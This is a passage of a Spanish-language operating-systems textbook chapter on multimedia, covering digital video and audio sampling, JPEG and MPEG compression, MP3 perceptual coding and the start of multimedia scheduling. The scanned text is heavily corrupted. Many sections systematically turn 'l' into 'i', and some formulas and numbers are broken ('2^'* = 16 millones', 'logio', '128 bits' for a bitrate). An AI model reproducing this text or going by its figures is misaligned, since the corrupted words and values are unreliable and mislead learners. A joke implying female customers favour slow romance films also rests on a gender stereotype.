sentación más simple del video digital es una secuencia de cuadros, cada uno de los cuales consis¬ 
te en una rejilla rectangular de elementos de imagen o píxeles. Para el video a color, se utilizan 
8 bits por pixel para cada uno de los colores RGB, con lo cual se obtienen 2^'* = 16 millones deco¬ 
lores, lo cual es suficiente. El ojo humano no alcanza a distinguir todos esos colores y mucho me¬ 
nos una cantidad mayor. 

Para producir un movimiento uniforme, el video digital (al igual que el video análogo) se debe 
mostrar por lo menos a 25 cuadros/seg. Sin embargo, como los monitores de computadora de buena 
calidad a menudo vuelven a explorar la pantalla con imágenes almacenadas en la RAM de video 75 
veces por segundo o más, no se necesita el entrelazado. En consecuencia, todos los monitores de 
computadora utilizan la exploración progresiva. Con sólo volver a pintar (redibujar) el mismo cua¬ 
dro tres veces seguidas es suficiente para eliminar el parpadeo. 

En otras palabras, la uniformidad del movimiento se determina con base en el número de dis¬ 
tintas imágenes por segundo, y el parpadeo de acuerdo con el número de veces que se pinta la pan¬ 
talla por segundo. Estos dos parámetros son distintos. Una imagen inmóvil que se pinte a 20 
cuadros/seg no mostrará un movimiento entrecortado, sino que parpadeará debido a que un cuadro 
desaparecerá de la retina antes de que aparezca el siguiente. Una película con 20 cuadros distintos 
por segundo, cada uno de los cuales se pinta cuatro veces seguidas a 80 Hz, no parpadeará, sino que 
el movimiento aparecerá entrecortado. 
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La importancia de estos dos parámetros se vueive ciara cuando consideramos ei ancho de ban¬ 
da requerido para transmitir video digitai a través de una red. M uchos monitores de computadora 
utiiizan ia proporción de aspecto 4:3 para poder utiiizar tubos de imagen económicos y producidos 
en masa, diseñados para ei mercado de teievisiones para ei consumidor. Las configuraciones co¬ 
munes son 640 X 480 (VGA), 800 x 600 (SVGA), 1024 x 768 (XGA) y 1600 x 1200 (UXGA). 
Una pantaiia UXGA con 24 bits por píxei y 25 cuadros/seg necesita aiimentarse a 1.2 Gbps, pero 
hasta una pantaiia VGA necesita 184 M bps. No es conveniente dupiicar estas proporciones para evi¬ 
tar ei parpadeo. Una mejor soiución es transmitir 25 cuadros/seg y hacer que ia computadora aima- 
cene cada uno, y que io pinte dos veces. La teievisión por transmisión no utiiiza esta estrategia, ya 
queiosteievisores no tienen memoria, y en cuaiquier caso, ias señaiesanáiogas no se pueden aima- 
cenar en RAM sin primero convertidas en formato digitai, para io cuai se requiere un hardwareadi- 
cionai. Como consecuencia, se necesita ei entreiazado para ia teievisión por transmisión, pero no 
para ei video digitai. 


7.2.2 C odificación de audio 

Una onda de audio (sonido) es una onda (de presión) acústica unidimensionai. Cuando una onda 
acústica entra ai oído, ei tímpano vibra y hace que ios pequeños huesos dei oído interno vibren jun¬ 
to con éi, enviando puisos nerviosos ai cerebro. Ei espectador percibe estos puisos como sonido. De 
una manera simiiar, cuando una onda acústica goipea un micrófono, éste genera una señai eiéctrica 
que representa ia ampiitud dei sonido como función dei tiempo. 

Ei rango de frecuencia dei oído humano es de 20 Hz a 20,000 Hz; aigunos animaies, en espe- 
ciai ios perros, pueden escuchar frecuencias más aitas. Ei oído escucha en forma iogarítmica, por 
io que ia proporción de dos sonidos con ampiitudes A y B se expresa de manera convencionai en 
dB (decibeles), de acuerdo con ia fórmuia 

dB = 20 logio(A/B) 

Si definimos ei iímite inferior de audibiiidad (una aproximada presión de 0.0003 dinas/cm^) para 
una onda senoidai de 1 kHz como 0 dB, una conversación ordinaria es de aproximadamente 50 dB 
y ei umbrai de doior es de unos 120 dB, un rango dinámico de un factor de 1 miiión. Para evitar 
cuaiquier confusión, ios vaiores de A y B antes mencionados son ampiitudes. Si utiiizáramos ei ni- 
vei de potencia, que es proporcionai ai cuadrado de ia ampiitud, ei coeficiente dei iogaritmo sería 
de 10, no de 20. 

Las ondas de audio se pueden convertir a un formato digitai mediante un ADC (Anaiog Digi¬ 
tai Converter, Convertidor anáiogo digitai). Un ADC recibe un voitaje eiéctrico como entrada y 
genera un número binario como sai ida. En ia figura 7-5(a) podemos ver un ejempio de una onda se¬ 
noidai. Para representar esta señai en forma digitai, podemos muestrearia cada AT segundos, como 
se muestra mediante ias aituras de ias barras en ia figura 7-5(b). Si una onda de sonido no es una 
onda senoidai pura, sino una superposición de ondas senoidai es donde ei componente de frecuen¬ 
cia más aita presente es f, entonces basta con reaiizar muéstreos a una frecuencia de 2f. Este resui- 
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tado fue demostrado en forma matemática en Bell Labs por un físico llamado Harry Nyquist, en 
1924, y se conoce como el teorema de Nyquist. No tiene caso realizar muéstreos más seguido, ya 
que las frecuencias más altas que podría detectar dicho muestreo no están presentes. 


1.00 

0.75 

0.50 

0.25 

o 

-0.25 

-0.50 

-0.75 

- 1.00 


(a) 



Figura 7-5. (a) U na onda senoidal, (b) M uestreo de la onda senoidal, (c) Cuantlflca- 
ción de las muestras a 4 bits. 


Las muestras digitales nunca son exactas. Las muestras de la figura 7-5(c) sólo permiten nue¬ 
ve valores, de -1.00 a -i-l.OO en incrementos de 0.25. En consecuencia, se necesitan 4 bits para re¬ 
presentarlos todos. Una muestra de 8 bits permitiría 256 valores distintos. Una muestra de 16 bits 
permitiría 65,536 valores distintos. El error introducido por el número finito de bits por muestreo 
se conoce como ruido de cuantificación. Si es demasiado grande, el oído lo detecta. 

Dos ejemplos muy conocidos de sonido muestreado son el teléfono y los discos compactos de au- 
dio. La moduiación de código de puisos se utiliza en el sistema telefónico y usa muestras de 7 bits 
(Norteamérica y japón) u 8 bits (Europa), 8000 veces por segundo. Este sistema produce una veloci¬ 
dad de datos de 56,000 bps o 64,000 bps. Con sólo 8000 muestras/seg, se pierden las frecuencias ma¬ 
yores de 4 kHz. 

Los CDs de audio son digitales con una velocidad de muestreo de 44,100 muestras/seg, sufi¬ 
ciente para capturar frecuencias de hasta 22,050 Hz, que es bueno para las personas pero malo pa¬ 
ra los perros. Las muestras son de 16 bits cada una, y son lineales sobre el rango de amplitudes. 
Tenga en cuenta que las muestras de 16 bits permiten sólo 65,536 valores distintos, aun cuando el 
rango dinámico del oído es de aproximadamente 1 millón cuando se mide en incrementos del soni¬ 
do audible más pequeño. Por ende, al utilizar sólo 16 bits por muestra se introduce cierto ruido de 
cuantificación (aunque no se cubre el rango dinámico completo: se supone que los CDs no deben 
lastimar). Con 44,100 muestras/seg de 16 bits cada una, un CD de audio necesita un ancho de ban¬ 
da de 705.6 Kbps para monoaural y 1,411 M bps para estéreo (vea la figura 7-2). La compresión de 
audio es posible con base en los modelos psicoacústicos de la forma en que funciona el oído huma¬ 
no. Es posible una compresión de lOx si se utiliza el sistema M PEG nivel 3 (M P3). Los reproduc¬ 
tores de música portátiles para este formato han sido comunes en años recientes. 

El sonido digitalizado puede ser procesado con facilidad por el software de las computadoras. 
Existen docenas de programas para que las computadoras personales permitan a los usuarios 
grabar, mostrar, editar, mezclar y almacenar ondas de sonido de varias fuentes. Casi todas las 
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grabaciones y ediciones de sonido profesionaies son digitaies en ia actuaiidad. Lo anáiogo casi de¬ 
saparece por compieto. 


7.3 COMPRESIÓN DE VIDEO 

En este punto debe ser obvio que ia manipuiación de materiai muitimedia en forma descomprimi¬ 
da está compietamentefuera de consideración por ser demasiado grande. La única esperanza es que 
sea posibie ia compresión masiva. Por fortuna, un gran cuerpo de investigación durante ias úitimas 
décadas ha descubierto muchas técnicas de compresión y aigoritmos que hacen factibie ia transmi¬ 
sión de muitimedia. En ias siguientes secciones estudiaremos más métodos para comprimir datos 
muitimedia, en especiai imágenes. Para obtener más detaiies, vea Fiuckiger, 1995; Steinmetz y 
Nahrstedt, 1995. 

Todos ios sistemas de compresión requieren dos aigoritmos: uno para comprimir ios datos en 
ei origen, y otro para descomprimidos en ei destino. En ia iiteratura, a estos aigoritmos se Íes co¬ 
noce como aigoritmos de codificación y decodificación, respectivamente. Aquí también utiiizare- 
mos esa terminoiogía. 

Estos aigoritmos tienen ciertas asimetrías que son importantes de comprender. En primer iugar, 
para muchas apiicaciones, un documento muitimedia (como una peiícuia) sóio se codifica una vez 
(cuando se aimacena en ei servidor de muitimedia) pero se decodificará miies de veces (cuando io 
vean ios ciientes). Esta asimetría indica que es aceptabie para ei aigoritmo de codificación ser ien- 
to y requerir hardware costoso, siempre y cuando ei aigoritmo de decodificación sea rápido y no re¬ 
quiera hardware costoso. Por otra parte, para ia muitimedia en tiempo reai como ias conferencias 
de video, no es aceptabie una codificación ienta. La codificación debe ocurrir ai instante, en tiem¬ 
po reai. 

Una segunda asimetría es que ei proceso de codificación/decodificación no necesita ser 100% 
invertibie. Es decir, ai comprimir un archivo, transmitido y después descomprimido, ei usuario es¬ 
pera ver ei originai otra vez, con una precisión de hasta ei úitimo bit. Con ia muitimedia este reque¬ 
rimiento no existe. Por io generai es aceptabie que ia señai de video después de ia codificación y ia 
decodificación sea un poco distinta a ia señai originai. Cuando ia saiida decodificada no es exacta¬ 
mente iguai a ia entrada originai, se dice que ei sistema tiene pérdidas. Todos ios sistemas de com¬ 
presión utiiizados para muitimedia tienen pérdidas, debido a que proporcionan una compresión 
mucho mejor. 

7.3.1 El estándar] PEG 

Ei estándar JPEG (joint Photographic Experts Group, Grupo de expertos unidos en fotografía) 
para comprimir imágenes fijas de tono continuo (como ias fotografías) fue desarroiiado por exper¬ 
tos fotográficos que trabajaban bajo ios auspicios unidos de ITU, ISO e lEC, otro cuerpo de están¬ 
dares. Es importante para ia muitimedia, ya que en una primera aproximación, ei estándar de 
muitimedia para ias imágenes en movimiento, M PEG, es sóio ia codificación j PEG de cada cuadro 
por separado, más ciertas características adicionaies para ia compresión entre cuadros y ia compen- 
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sación de movimiento. J PEG se define en ei Estándar Internacionai 10918. Tiene cuatro modos y 
muchas opciones, pero sóio nos preocuparemos por ia forma en que se utiiiza para ei video RGB 
de 24 bits y omitiremos muchos de ios detaiies. 

Ei paso 1 de codificación de una imagen con JPEG es una preparación de bioques. En aras de 
simpiicidad vamos a suponer que ia entrada JPEG es una imagen RGB de 640 x 480 con 24 bits- 
/pixei, como se muestra en ia figura 7-6(a). Como ei uso de iuminancia y crominancia proporciona 
una mejor compresión, ia iuminancia y dos señaies de crominancia se caicuian a partir de ios vaiores 
RGB.EnNTSC se conocen como Y, I y Q, respectivamente. En PAL son Y, U y V, y iasfórmuias son 
distintas. A continuación utiiizaremos ios nombres de NTSC, pero ei aigoritmo de compresión es ei 
mismo. 


RGB 

640 



Y 

640 



I 



Q 


Figura 7-6. (a) Datos de entrada RGB. (b) Después de la preparación de los bloques. 


Se construyen matrices separadas para Y, I y Q, cada una con ei ementas en ei rango deO a 255. 
A continuación se promedian bioques de cuatro píxeies en i as matrices I y 0 para reducidas a 
320 X 240. Esta reducción tiene pérdidas, pero ei ojo apenas si ias detecta, ya que responde más 
a ia iuminancia que a ia crominancia. Sin embargo, comprime ios datos por un factor de dos. Aho¬ 
ra se resta 128 a cada demento de ias tres matrices para poner ei 0 en medio dei rango. Por úiti- 
mo, cada matriz se divide en bioques de 8 x 8. La matrix Y tiene 4800 bioques: ias otras dos tienen 
1200 bioques cada una, como se muestra en ia figura 7.6(b). 

Ei paso2dejPEG es apiicar una DCT (Discreta Cosine Transformation, Transformación de 
coseno discreta) a cada uno de ios 7200 bioques por separado. La saiida de cada DCT es una ma¬ 
triz de 8 X 8 de coeficientes DCT. Ei demento DCT (0,0) es ei vaior promedio dei bioque. Los de¬ 
más dementas indican cuánto poder espectrai hay presente en cada frecuencia espaciai. Para ios 
iectores famiiiarizados con ias transformadas de Fourier, una DCT es un tipo de transformada de 
Fourier espaciai bidimensionai. En teoría una DCT no tiene pérdidas, pero en ia práctica ei uso 
de números de punto fiotante y funciones trascendentaies introduce cierto error de redondeo que 
produce una pequeña cantidad de pérdida de información. Por io generai, estos dementas se dete¬ 
rioran rápidamente con ia distancia a partir dei origen (0,0), como se sugiere en ia figura 7-7(b). 

Una vez compieta ia DCT, JPEG avanza ai paso 3, conocido como cuantificación, en ei que 
ios coeficientes DCT menos importantes se diminan. Esta transformación (con pérdidas) se reaiiza 
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Figura 7-7. (a) U n bloque de la matriz Y. (b) Los coeficientes DCT. 


dividiendo cada uno de los coeficientes en la matriz DCT de 8 x 8 por un peso que se toma de una 
tabla. Si todos los pesos son 1, la transformación no hace nada. No obstante, si los pesos aumentan 
en forma abrupta desde el origen, las frecuencias espaciales más altas decaen con rapidez. 

En la figura 7-8 se muestra un ejemplo de este paso. Aquí podemos ver la matriz DCT inicial, 
latabladecuantificacióny el resultado que se obtiene al dividir cada elemento DCT por el elemen¬ 
to de la tabla de cuantificación correspondiente. L os valores en la tabla de cuantificación no forman 
parte del estándar JPEG. Cada aplicación debe suministrar su propia tabla de cuantificación, otor¬ 
gándole la habilidad de controlar su propio intercambio entre pérdida-compresión. 
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Figura 7-8. Cáicuio de ios coeficientes DCT cuantificados. 

El paso 4 reduce el valor (0,0) de cada bloque (el de la esquina superior izquierda) al sustituir¬ 
lo con la cantidad por la que difiere del elemento correspondiente en el bloque anterior. Como es¬ 
tos elementos son los promedios de sus bloques respectivos, deben cambiar con lentitud, por lo que 
al obtener los valores diferenciales se debe reducir la mayoría de ellos a valores pequeños. No se 
calculan diferenciales de los otros valores. Los valores (0,0) se conocen como componentes DC; los 
otros valores son los componentesAC. 
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El paso 5 linealiza los 64 elementos y aplica una codificación de longitud de ejecución a la 
lista. Al explorar el bloque de izquierda a derecha y después de arriba hacia abajo, los ceros no se 
concentrarán en un punto, por lo que se utiliza un patrón de exploración en zigzag, como se mues¬ 
tra en la figura 7-9. En este ejemplo, el patrón de zigzag produce en última instancia 38 ceros con¬ 
secutivos al final de la matriz. Esta cadena se puede reducir a una sola cuenta que indique que hay 
38 ceros. 
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Figura 7-9. El orden en el que se transmiten los valores cuantificados. 


A hora tenemos una lista de números que representa a la imagen (en espacio de transformación). 
El paso 6 utiliza la codificación de Huffman en los números para su almacenamiento o transmisión. 

j PEG puede parecer complicado: lo es. A ún así, como a menudo produce una compresión de 
20:1 o mejor, se utiliza ampliamente. Para decodificar una imagen JPEG se requiere ejecutar el al¬ 
goritmo en sentido inverso. JPEG es más o menos simétrico: requiere casi el mismo tiempo para 
decodificar una imagen que para codificarla. 


7.3.2 El estándar MPEG 

Por último, hemos llegado al meollo del asunto: los estándares MPEG (Motion Picture Expert 
Groups, Grupo de expertos en películas). Éstos son los principales algoritmos utilizados para 
comprimir vi déos y han sido estándares internacionales desde 1993. M PEG-1 (Estándar Internacio¬ 
nal 11172) se diseñó para una salida con calidad de grabadora de video (352 x 240 para NTSC), uti¬ 
lizando una velocidad de bits de 1.2 M bps. M PEG-2 (Estándar Internacional 13818) se diseñó para 
comprimir el video de calidad de transmisión en 4 o 6 M bps, para que pudiera caber en un canal de 
transmisión NTSC o PAL. 

Ambas versiones aprovechan los dos tipos de redundancias que existen en las películas: espa¬ 
cial y temporal. La redundancia espacial se puede utilizar con sólo codificar cada cuadro por separa¬ 
do con JPEG. Para obtener una compresión adicional hay que aprovechar el hecho de que los 
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cuadros consecutivos son casi siempre idénticos (redundancia temporai). Ei sistema DV (Video Di¬ 
gital) que utiiizan ias cámaras de video sóio utiiiza un esquema parecido a JPEG, debido a que ia 
codificación se tiene que iievar a cabo en tiempo reai, y es mucho más rápido sóio codificar cada 
cuadro por separado. Las consecuencias de esta decisión se pueden ver en ia figura 7-2: aunque ias 
cámaras de video digitaies tienen una veiocidad de datos menor que ei video sin comprimir, no son, 
ni de iejos, tan buenas como ei M PEG-2 (para que ia comparación sea honesta, tenga en cuenta que 
ias cámaras de video DV muestrean ia iuminancia con 8 bits y cada señai decrominancia con 2 bits, 
pero de todas formas hay un factor de compresión de cinco ai utiiizar ia codificación simiiar a 
JPEG). 

Para ias escenas en ias que ia cámara y ei fondo son rígidamente estacionarios y uno o dos ac¬ 
tores se están moviendo con ientitud, casi todos ios píxeies serán idénticos de un cuadro a otro. A quí 
sóio habría que restar cada cuadro dei anterior y ejecutar] PEG en ia diferencia. Sin embargo, para 
escenas donde i a cámara se mueve o se acerca/ai ej a ientamente, esta técnica tiene muchas faiias. Lo 
que se necesita es una forma de compensar este movimiento. Esto es i o que hace M PEG; de hecho, 
es ia principai diferencia entre M PEG y j PEG. 

La saiida M PEG-2 consiste en tres tipos distintos de cuadros que deben ser procesados por ei 
programa visor: 

1. Cuadros I (intracodificados): imágenes fijas autoconteni das, codificadas en JPEG. 

2. Cuadros P (predictivos): diferencia con ei úitimo cuadro, bioque por bioque. 

3. Cuadros B (bidireccionaies): diferencias entre ei úitimo cuadro y ei siguiente. 

Los cuadros I son sóio imágenes fijas codificadas mediante ei uso de] PEG, que también utiiizan 
iuminancia de resoiución compieta y crominancia de resoiución media a io iargo de cada eje. Es ne¬ 
cesario que ios cuadros I aparezcan en ei fiujo de saiida en forma periódica, por tres razones. En 
primer iugar, M PEG se puede utiiizar para ias transmisiones de teievisión, donde ios espectadores 
sintonizan a voiuntad. Si todas ios cuadros dependieran de sus predecesores hasta regresar ai pri¬ 
mer cuadro, cuaiquiera que se perdiera ei primer cuadro nunca podría decodificar ios cuadros sub¬ 
siguientes. Esto haría imposibie que ios espectadores sintonizaran ia peiícuia después de haber 
empezado. En segundo iugar, si se recibiera cuaiquier cuadro con error, no sería posibie continuar 
ia decodificación. En tercer iugar, sin cuadros I, ai reaiizar un adeianto o atraso rápido ei decodifi¬ 
cador tendría que caicuiar cada cuadro por ei que pasara, para conocer ei vaior compieto dei cua¬ 
dro en ei que se detuviera. Con ios cuadros I es posibie avanzar o retroceder hasta encontrar un 
cuadro I y empezar a ver desde ahí. Por estas razones, ios cuadros I se insertan en ia saiida una o 
dos veces por segundo. 

Por ei contrario, ios cuadros P codifican ias diferencias entre cuadros. Se basan en ia idea de 
ios macrobloques, que cubren 16 x 16 píxeies en espacio de iuminancia y 8 x 8 píxeies en espa¬ 
cio de crominancia. Para codificar un macrobioque, se busca ei cuadro anterior para éi, o aigo un 
poco distinto de éi. 

En ia figura 7-10 se muestra un ejempio de ia utiiidad de ios cuadros P. Aquí podemos ver tres 
cuadros consecutivos que tienen ei mismo fondo, pero difieren en ia posición de una persona. Di¬ 
chas escenas son comunes cuando ia cámara está fija en un trípode y ios actores se mueven airede- 
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dor o enfrente del mismo. Los macrobloques que contienen ia escena de fondo coincidirán con 
exactitud, pero aqueiios que contienen a ia persona estarán despiazados en posición por una canti¬ 
dad desconocida, y tendrán que rastrearse. 



Figura 7-10. Tres cuadros de video consecutivos. 


Ei estándar M PEG no especifica cómo buscar, qué tanto buscar o qué tan buena tiene que ser 
una coincidencia para que cuente. Depende de cada impiementación. Por ejempio, una impiemen- 
tación podría buscar un macrobioque en ia posición actuai en ei cuadro anterior, y todas ias demás 
posiciones se despiezan una distancia ±Ax en ia dirección x y ±Ay en ia dirección y. Para cada po¬ 
sición se podría caicuiar ei número de coincidencias en ia matriz de iuminancia. La posición con ia 
puntuación más aita se deciararía ganadora, siempre y cuando estuviera por encima de un umbrai 
predefinido. En caso contrario, se diría que faita ei macrobioque. Desde iuego que también es po- 
sibie utiiizar aigoritmos mucho más sofisticados. 

Si se encuentra un macrobioque, se codifica sacando ia diferencia con su vaior en ei cuadro 
anterior (para ia iuminancia y ambas crominancias). Así, estas matrices de diferencia están suje- 
tasa ia codificaciónJPEG. Ei vaior para ei macrobioque en ei fiujo de saiida es entonces ei vec¬ 
tor de movimiento (qué tanto se aiejó ei macrobioque de su posición anterior en cada dirección), 
seguido por ias diferencias codificadas en J PEG con ei dei cuadro anterior. Si ei macrobioque no 
se encuentra en ei cuadro anterior, ei vaior actuai se codifica con J PEG, ai iguai que en un cua¬ 
dro I. 

Los cuadros B son simiiares a ios P, excepto que permiten que ei macrobioque de referencia es¬ 
té en un cuadro anterior o en uno subsiguiente, ya sea en un cuadro I o en uno P. Esta iibertad adi- 
cionai permite una compensación mejorada dei movimiento, y también es útii cuando ios objetos 
pasan enfrente de (o detrás de) otros objetos. Por ejempio, en un juego de béisboi, cuando ei terce¬ 
ra base ianza ia peiota a ia primera base, puede haber un cuadro en donde ia peiota oscurezca ia ca¬ 
beza dei segunda base que se mueve en ei fondo. En ei siguiente cuadro, ia cabeza puede estar 
parciaimente visibiea ia izquierda de ia peiota, en donde ia siguiente aproximación de ia cabeza se 
derive dei siguiente cuadro, cuando ia peiota ahora esté después de ia cabeza. Los cuadros B per¬ 
miten basar un cuadro en otro cuadro en ei futuro. 

Para reaiizar ia codificación dei cuadro B, ei codificador necesita contener tres cuadros deco¬ 
dificados en memoria ai mismo tiempo: ei pasado, ei actuai y ei futuro. Para simpiificar ia decodi¬ 
ficación, ios cuadros deben estar presentes en ei fiujo M PEG por orden de dependencia, en vez de 
estado por orden de visuaiización. Así, inciuso con una sincronización perfecta, cuando se ve un 
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video a través de una red, se requiere ei uso de búfer en ei equipo dei usuario para reordenar ios 
cuadros y poder visuaiizarios en forma apropiada. Debido a esta diferencia entre ei orden de depen¬ 
dencia y ei de visuaiización, tratar de reproducir una peiícuia en orden inverso no funcionará sin un 
uso considerabie de búfer y aigoritmos compiejos. 

Los fiimes con mucha acción y cortes rápidos (como ios de guerra) requieren muchos cuadros I. 
Los fiimes en ios que ei director puede orientar i a cámara y después ir a tomar un café mientras ios 
actores recitan sus iíneas (como ias historias de amor) pueden uti i i zar i argos ti rajes de cuadros P y cua¬ 
dros B, queutiiizan mucho menos capacidad deaimacenamiento que ios cuadros I. Desde ei punto de 
vista de i a eficiencia dei disco, una empresa que opere un servicio de muiti media debe por io tanto tra¬ 
tar de obtener tantos Chentes femeninos como sea posibie. 


7.4 COMPRESIÓN DE AUDIO 

Ei audio con caiidad de CD requiere un ancho de banda de transmisión de 1.411 M bps, como aca¬ 
bamos de ver. Sin duda se requiere una compresión considerabie para que ia transmisión por Inter¬ 
net sea práctica. Por esta razón se han desarroiiado varios aigoritmos de compresión de audio. 
Probabiemente ei más popuiarsea ei audio M PEG, que tiene tres niveies (variantes) deioscuaies 
MP3 (audio MPEG nivel 3) es ei más potente y conocido. Hay grandes cantidades de pistas de 
música en formato M P3 disponibies en Internet, no todas ellas legales, lo cual ha originado nume¬ 
rosas demandas de parte de los artistas y propietarios de los derechos de autor. M P3 pertenece a la 
porción de audio del estándar de compresión de video M PEG. 

La compresión de audio se puede realizar en una de tres formas. En la codificación deformas 
de onda, la señal se transforma matemáticamente mediante una transformada de Fourier en sus 
componentes de frecuencia. La figura 7-11 muestra un ejemplo en función del tiempo y sus prime¬ 
ras 15 amplitudes de Fourier. A continuación, la amplitud de cada componente se codifica en for¬ 
ma mínima. El objetivo es reproducir la forma de onda con precisión en el otro extremo, con la 
menor cantidad posible de bits. 

La otra forma, codificación perceptual, explota ciertas fallas en el sistema auditivo humano 
para codificar una señal de tal forma que suene igual para un oyente humano, aun si se ve muy dis¬ 
tinta en el osciloscopio. La codificación perceptual se basa en la ciencia déla psicoacústica: la ma¬ 
nera en que la gente percibe el sonido. M P3 se basa en la codificación perceptual. 

La propiedad clave de la codificación perceptual es que ciertos sonidos pueden enmascarar a 
otros. Imagine que está transmitiendo un concierto de flauta en vivo en un día cálido de verano. De 
repente, un grupo de trabajadores cerca de ahí encienden sus martillos neumáticos y empiezan a 
romper la calle. Nadie puede escucharya la flauta: sus sonidos han sido opacados por los martillos 
neumáticos. Para fines de transmisión, ahora basta con sólo codificar la banda de frecuencia utili¬ 
zada por los martillos neumáticos, ya que los oyentes no pueden escuchar la flauta de todas formas. 
A esto se le conoce como enmascaramiento de frecuencia: la capacidad que tiene un sonido fuer¬ 
te en una banda de frecuencia de ocultar un sonido más suave en otra banda de frecuencia, que se¬ 
ría audible en la ausencia del sonido fuerte. De hecho, incluso hasta después de que se detengan los 
martillos neumáticos, la flauta será inaudible durante un corto periodo, ya que el oído reduce el 
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Figura 7-11. (a) U na señal binaria y sus ampiitudes de Fourier de raíz cuadrada me¬ 
dia. (b) - (e) A proximaciones sucesivas a ia señai originai. 
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nivel de ganancia cuando empiezan los martillos y tarda un tiempo finito en volver a subir el nivel. 
A este efecto se le conoce como enmascaramiento temporal. 

Para concebir estos efectos de una forma más claramente cuantitativa, imagine el experimento 
1. U na persona en un salón silencioso se coloca unos audífonos conectados a la tarjeta de sonido de 
una computadora. La computadora genera una onda senoidal pura a 100 Hz, a una potencia baja pe¬ 
ro que aumenta en forma gradual. Se instruye a la persona para que oprima una tecla cuando escu¬ 
che el tono. La computadora graba el nivel de potencia actual y después repite el experimento a 
200 Hz, 300 Hz y todas las demás frecuencias hasta el límite de escucha humano. Cuando se pro¬ 
media entre mucha gente, una gráfica utilizada en funciones logarítmicas de la potencia requerida 
para que un tono sea audible tiene una apariencia similar a la de la figura 7-12(a). U na consecuen¬ 
cia directa de esta curva es que nunca será necesario codificar frecuencias cuya potencia esté 
por debajo del umbral de lo audible. Por ejemplo, si la potencia a 100 Hz fuera de 20 dB en la fi¬ 
gura 7-12(a), podría omitirse de la salida sin pérdida perceptible de calidad, ya que 20 dB a 100 Hz 
están por debajo del nivel de audibilidad. 



Figura 7-12. (a) El umbral de audibilidad como una función de la frecuencia, (b) El 
efecto de enmascaramiento. 


Ahora considere el experimento 2. La computadora ejecuta el experimento Idenuevo, pero es¬ 
ta vez con una onda senoidal de amplitud constante a, por ejemplo, 150 Hz, superimpuesta en la fre¬ 
cuencia de prueba. Lo que descubrimos es que el umbral de audibilidad para las frecuencias cerca 
de 150 Hz se eleva, como se muestra en la figura 7-12(b). 

La consecuencia de esta nueva observación es que al llevar el registro de cuáles señales están 
siendo enmascaradas por señales más poderosas en bandas cercanas de frecuencia, podemos omi¬ 
tir más y más frecuencias en la señal codificada, ahorrando bits. En la figura 7-12, la señal de 125 
Hz se puede omitir por completo de la salida y nadie podrá escuchar la diferencia. Incluso después 
de que se detenga una señal poderosa en cierta banda de frecuencia, el conocimiento de sus pro¬ 
piedades de enmascaramiento temporal nos permite omitir las frecuencias enmascaradas durante 
cierto intervalo, hasta que el oído se recupere. La esencia de la codificación M P3 es aplicar una 
transformada de Fourier al sonido para obtener la potencia en cada frecuencia y después transmi¬ 
tir sólo las frecuencias desenmascaradas, codificándolas con la menor cantidad posible de bits. 
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Con toda esta información como antecedente, podemos ver cómo se reai iza i a codificación. La 
compresión de audio se iieva a cabo mediante un muestreo de ia forma de onda a 32 kHz, 44.1 kHz 
o 48 kHz. Ei primer vaior y ei úitimo son números enteros. Ei vaior de 44.1 kHz es ei que se utiii- 
za para ios CDs de audio, y se eiigió debido a que es io suficiente bueno como para capturar toda 
ia información de audio que puede escuchar ei oído humano. Ei muestreo se puede reaiizar en uno 
o dos canaies, en cuaiquiera de cuatro configuraciones: 

1. M onofónico (un soio fiujo de entrada). 

2. M onofónico duai (por ejempio, una pista de sonido en ingiés y otra en japonés). 

3. Estéreo desunido (cada canai se comprime por separado). 

4. Estéreo unido (se expiota por compieto ia redundancia entre canaies). 

En primer iugar, se seiecciona ia veiocidad de bits. M P3 puede comprimir un CD de rock and 
roii en sonido estéreo hasta a 96 kbps, con poca pérdida perceptibiedecaiidad, inciuso para ios fa¬ 
náticos dei rock and roii que todavía conserven su capacidad auditiva sin pérdida. Para un concier¬ 
to de piano se requieren por io menos 128 bits. La diferencia se da debido a que ia proporción de 
señai a ruido para ei rock and roii es mucho mayor que para un concierto de piano (en sentido 
de ingeniería, por io menos). También es posibie seieccionar veiocidades de saiida más bajas y 
aceptar cierta pérdida en ia caiidad. 

Después, ias muestras se procesan en grupos de 1152 (de aproximadamente 26 mseg). Cada 
grupo se pasa primero a través de 32 fiitros digitaies para obtener 32 bandas de frecuencia. Ai mis¬ 
mo tiempo, ia entrada se aiimenta a un modeio psicoacústico, para poder determinar ias frecuencias 
enmascaradas. Después, cada una de ias 32 bandas de frecuencia se transforma para proveer una re- 
soiución espectrai más fina. 

En ia siguiente fase, ei presupuesto de bits disponibies se divide entre ias bandas, se asignan 
más bits a ias bandas con ia potencia espectrai menos enmascarada, menos bits a ias bandas desen¬ 
mascaradas con menos potencia espectrai y ningún bit se asigna a ias bandas enmascaradas. Por úi¬ 
timo, ios bits se codifican utiiizando ia codificación de Huffman, que asigna códigos cortos a ios 
números que aparecen con frecuencia y códigos iargos a ios que ocurren con poca frecuencia. 

En reaiidad hay más detaiies en este proceso. Se utiiizan también varias técnicas para ia reduc¬ 
ción de ruido, antiaiias y para expiotar ia redundancia entre canaies, si es posibie, pero esto se en¬ 
cuentra más aiiá dei aicance de este iibro. 


7.5 PROGRAMACIÓN DE PROCESOS MULTIMEDIA 

Los sistemas operativos que soportan muitimedia difieren de ios sistemas tradicionaies en tres for¬ 
mas principaies: programación de procesos, sistema de archivos y programación de disco. Empeza¬ 
remos aquí con ia programación de procesos y continuaremos con ios demás temas en secciones 
subsiguientes. 
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7.5.1 Procesos de programación homogéneos 

El tipo más simple de servidor de video es el que puede permite la visualización de un número 
fijo de películas, donde todas utilizan la misma velocidad de cuadro, resolución de video, velo¬ 
cidad de datos y otros parámetros. Bajo estas circunstancias, un algoritmo de programación sim¬ 
ple pero efectivo puede ser el siguiente. Para cada película hay un solo proceso (o hilo), cuyo 
trabajo es leer la película del disco un cuadro a la vez y después transmitir ese cuadro al usuario. 
Como todos los procesos tienen la misma importancia, tienen que realizar el mismo trabajo por cua¬ 
dro y se bloquean al terminar de procesar el cuadro actual; se puede utilizar la programación por 
turno rotatorio sin problemas. La única adición necesaria a los algoritmos de programación están¬ 
dar es un mecanismo de sincronización para asegurar que cada proceso se ejecute a la frecuencia 
correcta. 

U na manera de lograr la sincronización apropiada es tener un reloj maestro que emita pulsos a, 
por ejemplo, 30 veces por segundo (para NTSC). En cada pulso, todos los procesos se ejecutan en 
forma secuencial y en el mismo orden. Cuando un proceso completa su trabajo, emite una llamada 
al sistema suspend que libera la CPU hasta que el reloj maestro vuelve a emitir otro pulso. Cuan¬ 
do esto ocurre, todos los procesos se ejecutan de nuevo en el mismo orden. M i entras que el núme¬ 
